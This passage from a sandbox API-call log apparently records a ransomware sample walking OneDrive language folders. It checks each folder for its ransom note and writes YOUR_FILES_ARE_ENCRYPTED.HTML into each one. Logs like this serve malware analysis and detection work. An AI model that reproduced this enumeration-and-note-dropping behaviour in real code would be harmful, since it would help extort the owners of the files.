pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.440] GetProcessHeap () returned 0x600000 [0113.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\cs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.441] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.442] CloseHandle (hObject=0x32c) returned 1 [0113.442] GetProcessHeap () returned 0x600000 [0113.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.442] GetProcessHeap () returned 0x600000 [0113.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.442] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x756d8e23, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x756d8e23, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x756d8e23, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="cy-gb", cAlternateFileName="")) returned 1 [0113.442] StrStrIW (lpFirst="cy-gb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.442] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb") returned 81 [0113.442] GetProcessHeap () returned 0x600000 [0113.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.442] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb" [0113.442] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\*" [0113.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x756d8e23, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x756d8e23, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x757bdd52, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.443] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x756d8e23, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x756d8e23, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x757bdd52, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.443] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x757bdd52, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x757bdd52, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x75856614, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.443] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.443] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.443] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.443] lstrlenW (lpString=".mui") returned 4 [0113.443] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.443] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x757bdd52, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x757bdd52, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x75856614, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.443] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.443] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.443] GetProcessHeap () returned 0x600000 [0113.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\cy-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.443] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.450] CloseHandle (hObject=0x32c) returned 1 [0113.450] GetProcessHeap () returned 0x600000 [0113.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.450] GetProcessHeap () returned 0x600000 [0113.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.452] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7587ca25, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7587ca25, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7587ca25, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="da", cAlternateFileName="")) returned 1 [0113.452] StrStrIW (lpFirst="da", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.452] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da") returned 78 [0113.452] GetProcessHeap () returned 0x600000 [0113.452] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.453] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da" [0113.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\*" [0113.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7587ca25, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7587ca25, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x75cf4da3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.454] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7587ca25, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7587ca25, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x75cf4da3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.454] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75cf4da3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x75cf4da3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x76015f2a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.454] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.454] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.454] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.454] lstrlenW (lpString=".mui") returned 4 [0113.454] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.454] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75cf4da3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x75cf4da3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x76015f2a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.454] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.454] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.454] GetProcessHeap () returned 0x600000 [0113.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\da\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.455] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.456] CloseHandle (hObject=0x32c) returned 1 [0113.456] GetProcessHeap () returned 0x600000 [0113.456] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.456] GetProcessHeap () returned 0x600000 [0113.456] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.457] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x761472c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x761472c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x761472c9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="de", cAlternateFileName="")) returned 1 [0113.457] StrStrIW (lpFirst="de", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.457] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de") returned 78 [0113.457] GetProcessHeap () returned 0x600000 [0113.457] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.458] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de" [0113.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\*" [0113.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x761472c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x761472c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7641c0ca, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.458] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x761472c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x761472c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7641c0ca, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.458] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7641c0ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7641c0ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x76a5e2f9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.458] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.458] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.458] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.458] lstrlenW (lpString=".mui") returned 4 [0113.459] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.459] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7641c0ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7641c0ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x76a5e2f9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.459] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.459] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.459] GetProcessHeap () returned 0x600000 [0113.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.460] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.460] CloseHandle (hObject=0x32c) returned 1 [0113.460] GetProcessHeap () returned 0x600000 [0113.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.461] GetProcessHeap () returned 0x600000 [0113.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.461] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76af6cb3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x76af6cb3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x76af6cb3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="el", cAlternateFileName="")) returned 1 [0113.461] StrStrIW (lpFirst="el", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.461] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el") returned 78 [0113.461] GetProcessHeap () returned 0x600000 [0113.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.462] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el" [0113.462] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\*" [0113.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76af6cb3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x76af6cb3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x773c1775, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.463] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76af6cb3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x76af6cb3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x773c1775, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.463] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773c1775, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x773c1775, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x778ac20d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17cc0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.463] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.463] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.463] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.464] lstrlenW (lpString=".mui") returned 4 [0113.464] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.464] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773c1775, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x773c1775, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x778ac20d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17cc0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.464] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.464] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 